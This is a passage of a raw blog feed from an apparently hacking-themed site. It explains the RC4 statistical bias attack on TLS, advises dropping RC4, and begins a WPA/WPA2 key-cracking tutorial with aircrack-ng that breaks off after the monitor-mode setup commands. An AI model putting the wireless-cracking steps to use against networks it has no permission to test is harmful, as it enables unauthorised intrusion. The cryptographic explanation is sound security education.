mitigated easily.&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=4pfJ22G-4SA:mz2Rl-Anzsc:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=4pfJ22G-4SA:mz2Rl-Anzsc:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=4pfJ22G-4SA:mz2Rl-Anzsc:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=4pfJ22G-4SA:mz2Rl-Anzsc:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=4pfJ22G-4SA:mz2Rl-Anzsc:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=4pfJ22G-4SA:mz2Rl-Anzsc:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=4pfJ22G-4SA:mz2Rl-Anzsc:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=4pfJ22G-4SA:mz2Rl-Anzsc:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=4pfJ22G-4SA:mz2Rl-Anzsc:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=4pfJ22G-4SA:mz2Rl-Anzsc:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=4pfJ22G-4SA:mz2Rl-Anzsc:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/4pfJ22G-4SA" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/4189183736098328426/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/04/anotomy-of-largest-ddos-attack-that.html#comment-form" title="3 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/4189183736098328426?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/4189183736098328426?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/4pfJ22G-4SA/anotomy-of-largest-ddos-attack-that.html" title="Anotomy of The Largest DDOS Attack That Almost Took Down The Internet" /><author><name>Shaharyar Shafiq</name><uri>https://plus.google.com/113862218722503273440</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/--k2pi9XiHU0/AAAAAAAAAAI/AAAAAAAAAHI/Kl1wAcIBxS4/s512-c/photo.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-EoTGr7UZIRE/UV2LI4obmFI/AAAAAAAACwQ/zof98ZK7Jto/s72-c/DOS.jpg" height="72" width="72" /><thr:total>3</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/04/anotomy-of-largest-ddos-attack-that.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DE4HRX0_eCp7ImA9WhBXGUQ.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-7623453640963117943</id><published>2013-04-01T05:49:00.000-07:00</published><updated>2013-04-03T06:48:54.340-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-04-03T06:48:54.340-07:00</app:edited><title>HTTPS Cracked! SSL/TLS Attacked And Exploited</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-pLDugjvPA60/UVcg6Ff2pcI/AAAAAAAABD0/dxhMOdUC3a8/s1600/https.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="441" src="http://3.bp.blogspot.com/-pLDugjvPA60/UVcg6Ff2pcI/AAAAAAAABD0/dxhMOdUC3a8/s640/https.png" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-family: inherit;"&gt;People who blog about ethical hacking have a very sincere relationship with Cryptographers. They (the Cryptographers) keep bringing in something delightful into the everyday nonsense and we blabber about their accomplishments until its squishy and old - this love goes far beyond then can be comprehended by normal folk. No offence.&lt;/span&gt;&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;span style="font-family: inherit;"&gt;It seems like they have swept us off our feet again and this time around, they are flaunting the big guns. &lt;/span&gt;&lt;b style="font-family: inherit;"&gt;&lt;a href="http://www.isg.rhul.ac.uk/tls/" rel="nofollow" target="_blank"&gt;Cryptographers have targeted SSL/TLS and done some serious damage to HTTPS.&lt;/a&gt;&lt;/b&gt;&lt;span style="font-family: inherit;"&gt; Transport Layer Security didn't face a major blow during the attack as it requires to capture millions and billions of connections consisting of the same plaintext. But this highlights a major issue present in using the RC4 encryption algorithm.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-family: inherit;"&gt;RC4 uses the same key for encryption and decryption, whereas TLS uses a public/private key pair for encryption and decryption which makes it lag therefore it uses a hybrid approach. TLS connection can be setup using public/private key pairs and once established can share encrypted data over a secure network that uses ciphers for encrypting data such as AES, DES, Triple-DES, Blowfish, RC4, etc.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: inherit;"&gt;&lt;/span&gt;

&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;span style="font-family: inherit;"&gt;&lt;a href="http://3.bp.blogspot.com/-TYgCbSxqIu8/UVcc1HWzRlI/AAAAAAAABDM/3l6Kiqu8vIE/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="278" src="http://3.bp.blogspot.com/-TYgCbSxqIu8/UVcc1HWzRlI/AAAAAAAABDM/3l6Kiqu8vIE/s640/1.png" width="640" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: inherit;"&gt;RC4 has been advised against many times in the past but its also a fact that it brings in half of all TLS traffic. So, the attack was done on a part of TLS by AlFardan-Bernstein-Paterson-Poettering-Schuldt (AIFBPPS).&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;b&gt;&lt;span style="font-family: inherit;"&gt;&lt;a href="http://nakedsecurity.sophos.com/2013/03/16/has-https-finally-been-cracked/" rel="nofollow" target="_blank"&gt;According to NakedSophos team;&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;blockquote class="tr_bq" style="text-align: left;"&gt;
&lt;span style="font-family: inherit;"&gt;RC4 is a&amp;nbsp;&lt;em style="background-color: transparent; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"&gt;stream cipher&lt;/em&gt;, so it is basically a keyed cryptographic pseudo-random number generator (PRNG). It emits a stream of cipher bytes that are XORed with your plaintext to produce the encrypted ciphertext.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: inherit;"&gt;To decrypt the ciphertext, you initialise RC4 with the same key, and XOR the ciphertext with the same stream of cipher bytes. XORing twice with the same value "cancels out", because&amp;nbsp;&lt;tt style="background-color: transparent; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"&gt;k XOR k = 0&lt;/tt&gt;, and because&amp;nbsp;&lt;tt style="background-color: transparent; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"&gt;p XOR 0 = p&lt;/tt&gt;.&lt;/span&gt;&lt;/blockquote&gt;
&lt;div style="background-color: white; border: 0px; color: #333333; font-family: arial, helvetica, sans-serif; font-size: 15px; margin-bottom: 10px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;"&gt;
&lt;span style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;span style="font-family: inherit;"&gt;RC4 generates a statistically anomalous output initially in each stream of cipher bytes. Therefore it is not a high-quality cryptographic PRNG. This phenomenon was first observed by Itsik Mantin and Adi Shamir in 2001. They noticed that during the second output byte the value zero turned up twice as often as it should; 256 keys on average to be precise with a probability of 1/128. This resulted in WEP being attacked which was then replaced by WPA.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-t7SpNIHnwlQ/UVcc1p2zW3I/AAAAAAAABDY/X9Js-XPygoc/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="102" src="http://1.bp.blogspot.com/-t7SpNIHnwlQ/UVcc1p2zW3I/AAAAAAAABDY/X9Js-XPygoc/s640/2.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: inherit;"&gt;AIFBPPS have taken this attack further than anyone else &lt;i&gt;"producing statistical tables for the probability of every output byte (0.255&lt;span style="background-color: white; color: #333333; text-align: -webkit-auto;"&gt;) &lt;/span&gt;&lt;span style="background-color: white; color: #333333; text-align: -webkit-auto;"&gt;for each of the first 256 output positions in an RC4 cipher stream, for a total of 65535 (256x256) measurements."&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="background-color: white; color: #333333; text-align: -webkit-auto;"&gt;&lt;span style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div style="background-color: white; border: 0px; color: #333333; margin-bottom: 10px; padding: 0px; text-align: -webkit-auto; vertical-align: baseline;"&gt;
&lt;/div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; text-align: left; vertical-align: baseline;"&gt;
&lt;b&gt;&lt;span style="font-family: inherit;"&gt;&lt;a href="http://nakedsecurity.sophos.com/2013/03/16/has-https-finally-been-cracked/" rel="nofollow" target="_blank"&gt;According to NakedSophos team;&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;span style="font-family: inherit;"&gt;By using a sufficiently large sample size of differently-keyed RC4 streams, they achieved results with sufficient precision to determine that almost every possible output was biased in some way.&lt;br /&gt;The probability tables for a few of the output positions (which are numbered from 1 to 256) are show below.&lt;br /&gt;The authors realised that if you could produce TLS connections over and over again that contained the the same data at a known offset inside the first 256 bytes (for example an HTTP request with a session cookie at the start of the headers), you could use their probability tables to guess the cipher stream bytes for those offsets.&lt;/span&gt;&lt;/blockquote&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-_g2PWxDpAeQ/UVcc1YAyd1I/AAAAAAAABDU/yuhv8HN_064/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://3.bp.blogspot.com/-_g2PWxDpAeQ/UVcc1YAyd1I/AAAAAAAABDU/yuhv8HN_064/s640/3.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; vertical-align: baseline;"&gt;
&lt;/div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; text-align: left; vertical-align: baseline;"&gt;
&lt;span style="color: black;"&gt;&lt;span style="font-family: inherit;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; text-align: left; vertical-align: baseline;"&gt;
&lt;span style="color: black;"&gt;&lt;span style="font-family: inherit;"&gt;&lt;b&gt;Here's a brief description of how it works by NakedSophos team:&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="font-family: inherit;"&gt;"Imagine that you know that the 48th plaintext byte, P&lt;sub style="background-color: transparent; border: 0px; height: 0px; line-height: 1; margin: 0px; padding: 0px; position: relative; top: 0.5ex; vertical-align: baseline;"&gt;48&lt;/sub&gt;, is always the same, but not what it is.&lt;/span&gt;&lt;/div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; vertical-align: baseline;"&gt;
&lt;/div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="font-family: inherit;"&gt;You provoke millions of TLS connections containing that fixed-but-unknown P&lt;sub style="background-color: transparent; border: 0px; height: 0px; line-height: 1; margin: 0px; padding: 0px; position: relative; top: 0.5ex; vertical-align: baseline;"&gt;48&lt;/sub&gt;; in each connection, which will be using a randomly-chosen session key, P&lt;sub style="background-color: transparent; border: 0px; height: 0px; line-height: 1; margin: 0px; padding: 0px; position: relative; top: 0.5ex; vertical-align: baseline;"&gt;48&lt;/sub&gt;&amp;nbsp;will end up encrypted with a pseudo-random cipher byte, K&lt;sub style="background-color: transparent; border: 0px; height: 0px; line-height: 1; margin: 0px; padding: 0px; position: relative; top: 0.5ex; vertical-align: baseline;"&gt;48&lt;/sub&gt;, to give a pseudo-random ciphertext byte, C&lt;sub style="background-color: transparent; border: 0px; height: 0px; line-height: 1; margin: 0px; padding: 0px; position: relative; top: 0.5ex; vertical-align: baseline;"&gt;48&lt;/sub&gt;.&lt;/span&gt;&lt;/div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="font-family: inherit;"&gt;And you sniff the network traffic so you capture millions of different samples of C&lt;sub style="background-color: transparent; border: 0px; height: 0px; line-height: 1; margin: 0px; padding: 0px; position: relative; top: 0.5ex; vertical-align: baseline;"&gt;48&lt;/sub&gt;.&lt;/span&gt;&lt;/div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="font-family: inherit;"&gt;Now imagine that one value for C&lt;sub style="background-color: transparent; border: 0px; height: 0px; line-height: 1; margin: 0px; padding: 0px; position: relative; top: 0.5ex; vertical-align: baseline;"&gt;48&lt;/sub&gt;&amp;nbsp;shows up more than 1% (1.01 times) more frequently than it ought to. We'll refer to this skewed value of C&lt;sub style="background-color: transparent; border: 0px; height: 0px; line-height: 1; margin: 0px; padding: 0px; position: relative; top: 0.5ex; vertical-align: baseline;"&gt;48&lt;/sub&gt;&amp;nbsp;as C'.&lt;/span&gt;&lt;/div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="font-family: inherit;"&gt;From the probability table for K&lt;sub style="background-color: transparent; border: 0px; height: 0px; line-height: 1; margin: 0px; padding: 0px; position: relative; top: 0.5ex; vertical-align: baseline;"&gt;48&lt;/sub&gt;&amp;nbsp;above, you would guess that the cipher byte used for encrypting P to produce C' must have been 208 (0xD0), since K&lt;sub style="background-color: transparent; border: 0px; height: 0px; line-height: 1; margin: 0px; padding: 0px; position: relative; top: 0.5ex; vertical-align: baseline;"&gt;48&lt;/sub&gt;&amp;nbsp;takes the value 208 more than 1% too often.&lt;/span&gt;&lt;/div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="font-family: inherit;"&gt;In other words, C' must be&amp;nbsp;&lt;tt style="background-color: transparent; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"&gt;P XOR 208&lt;/tt&gt;, so that P must be&amp;nbsp;&lt;tt style="background-color: transparent; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"&gt;C' XOR 208&lt;/tt&gt;, and you have recovered the 48th byte of plaintext.&lt;/span&gt;&lt;/div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="font-family: inherit;"&gt;The guesswork gets a little harder for cipher stream offsets where the skew in frequency distribution is less significant, but it's still possible, given sufficiently many captured TLS sessions.&lt;/span&gt;&lt;/div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="font-family: inherit;"&gt;AlFBPPS measured how accurate their plaintext guesses were for varying numbers of TLS sessions, and the results were worrying, if not actually scary:&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-6DhbX4cboUs/UVcc2jJrDYI/AAAAAAAABDs/AOPlfgYjGxQ/s1600/5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="212" src="http://2.bp.blogspot.com/-6DhbX4cboUs/UVcc2jJrDYI/AAAAAAAABDs/AOPlfgYjGxQ/s640/5.png" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="font-family: inherit;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="font-family: inherit;"&gt;"However, given the huge number of TLS sessions required, The Register's provocative URL&amp;nbsp;&lt;a href="http://www.theregister.co.uk/2013/03/15/tls_broken/" rel="nofollow" style="background-color: transparent; background-position: initial initial; background-repeat: initial initial; border: 0px; color: #2571c2; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;"&gt;&lt;tt style="background-color: transparent; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"&gt;theregister.co.uk/tls_broken&lt;/tt&gt;&lt;/a&gt;&amp;nbsp;might be going a bit far.&lt;/span&gt;&lt;/div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="font-family: inherit;"&gt;Initiating 2&lt;sup style="background-color: transparent; border: 0px; bottom: 1ex; height: 0px; line-height: 1; margin: 0px; padding: 0px; position: relative; vertical-align: baseline;"&gt;32&lt;/sup&gt;&amp;nbsp;(4 billion), or even 2&lt;sup style="background-color: transparent; border: 0px; bottom: 1ex; height: 0px; line-height: 1; margin: 0px; padding: 0px; position: relative; vertical-align: baseline;"&gt;28&lt;/sup&gt;&amp;nbsp;(260 million), TLS sessions, and then sniffing and post-processing the results to extract a session cookie is unlikely to be a practicable attack any time soon.&lt;/span&gt;&lt;/div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="font-family: inherit;"&gt;If nothing else, the validity of the session cookie might reasonably be expected to be shorter than the time taken to provoke hundreds of millions of redundant TLS connections.&lt;/span&gt;&lt;/div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="font-family: inherit;"&gt;On the other hand, the advice to avoid RC4 altogether because of its not-so-random PRNG can't be written off as needlessly conservative.&lt;/span&gt;&lt;/div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; vertical-align: baseline;"&gt;
&lt;strong style="background-color: transparent; border: 0px; margin: 0px; padding: 0px; vertical-align: baseline;"&gt;&lt;span style="font-family: inherit;"&gt;If you can, ditch RC4 from the set of symmetric ciphers your web browser is willing to use, and your web servers to accept.&lt;/span&gt;&lt;/strong&gt;&lt;/div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="font-family: inherit;"&gt;Go for AES-GCM instead.&lt;/span&gt;&lt;/div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="font-family: inherit;"&gt;GCM, or&amp;nbsp;Galois/Counter Mode, is a comparatively new way of using block ciphers that gives you encryption and authentication all in one, which not only avoids the risky RC4 cipher, but neatly bypasses the problems exposed in the Lucky 13 attack, too."&lt;/span&gt;&lt;/div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; text-align: left; vertical-align: baseline;"&gt;
&lt;span style="font-family: inherit;"&gt;Cheers!&lt;/span&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; text-align: left; vertical-align: baseline;"&gt;
&lt;b&gt;&lt;span style="font-family: inherit;"&gt;About the Author:&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div style="border: 0px; margin-bottom: 10px; padding: 0px; text-align: left; vertical-align: baseline;"&gt;
&lt;span style="font-family: inherit;"&gt;This Article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=kkPYMwf-eZ8:zskp8EVXvFk:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=kkPYMwf-eZ8:zskp8EVXvFk:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=kkPYMwf-eZ8:zskp8EVXvFk:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=kkPYMwf-eZ8:zskp8EVXvFk:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=kkPYMwf-eZ8:zskp8EVXvFk:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=kkPYMwf-eZ8:zskp8EVXvFk:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=kkPYMwf-eZ8:zskp8EVXvFk:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=kkPYMwf-eZ8:zskp8EVXvFk:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=kkPYMwf-eZ8:zskp8EVXvFk:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=kkPYMwf-eZ8:zskp8EVXvFk:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=kkPYMwf-eZ8:zskp8EVXvFk:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/kkPYMwf-eZ8" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/7623453640963117943/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/04/https-cracked-ssltls-attacked-and.html#comment-form" title="4 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/7623453640963117943?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/7623453640963117943?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/kkPYMwf-eZ8/https-cracked-ssltls-attacked-and.html" title="HTTPS Cracked! SSL/TLS Attacked And Exploited" /><author><name>Dr. Sindhia Javed Junejo</name><uri>http://www.blogger.com/profile/01429590087313279750</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="http://4.bp.blogspot.com/-q7qO-M4AY2E/UIRbUxdSx8I/AAAAAAAAAwE/dUwQNL1DQVk/s220/V_mask.png" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-pLDugjvPA60/UVcg6Ff2pcI/AAAAAAAABD0/dxhMOdUC3a8/s72-c/https.png" height="72" width="72" /><thr:total>4</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/04/https-cracked-ssltls-attacked-and.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DEQCRH8_eip7ImA9WhBXFUU.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-1931442873947177752</id><published>2013-03-29T12:45:00.000-07:00</published><updated>2013-03-29T12:46:05.142-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-03-29T12:46:05.142-07:00</app:edited><title>How To Crack A WPA Key With Aircrack-ng</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-6neXo2ztHSs/UVXcpch_yRI/AAAAAAAAAGA/jRiTyQo5Ofs/s1600/How-to-Hack-Wifi-and-how-to-avoid-being-hacked-.jpg.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="276" src="http://1.bp.blogspot.com/-6neXo2ztHSs/UVXcpch_yRI/AAAAAAAAAGA/jRiTyQo5Ofs/s400/How-to-Hack-Wifi-and-how-to-avoid-being-hacked-.jpg.gif" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
With the increase in popularity of wireless networks and mobile computing, an overall understanding of common security issues has become not only relevant, but very necessary for both home users and IT professionals alike. This article is aimed at illustrating current security flaws in WPA/WPA2.

Successfully cracking a wireless network assumes some basic familiarity with networking principles and terminology. To successfully crack WPA/WPA2, you first need to be able to set your wireless network card in "monitor" mode to passively capture packets without being associated with a network. 

One of the best free utilities for monitoring wireless traffic and cracking WPA-PSK/WPA2 keys is the aircrack-ng suite, which we will use throughout this article. It has both Linux and Windows versions (provided your network card is supported under Windows).&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
Network Adapter I am going to use for WPA/WPA2 cracking is &lt;b&gt;Alfa AWUS036H&lt;/b&gt; , &lt;b&gt;OS#  Backtrack 5R2&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1 : Setting up your network device&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
To capture network traffic wihtout being associated with an access point, we need to set the wireless network card in monitor mode. To do that, type:&lt;br /&gt;
&lt;b&gt;Command # iwconfig&lt;/b&gt; (to find all wireless network interfaces and their status)&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-bSVJMEFBm-U/UVXSl3D0fsI/AAAAAAAAAFE/BzBYXyAzKSs/s1600/1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="275" src="http://3.bp.blogspot.com/-bSVJMEFBm-U/UVXSl3D0fsI/AAAAAAAAAFE/BzBYXyAzKSs/s400/1.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;b&gt;Command # airmon-ng start wlan0&lt;/b&gt;   (to set in monitor mode, you may have to substitute wlan0 for your own interface name)&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/--B6cDj51bL8/UVXSmKDBFYI/AAAAAAAAAFM/zBdL1biAzhU/s1600/2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="231" src="http://1.bp.blogspot.com/--B6cDj51bL8/UVXSmKDBFYI/AAAAAAAAAFM/zBdL1biAzhU/s400/2.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&amp;nbsp;&lt;b&gt;Step 2 : Reconnaissance&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
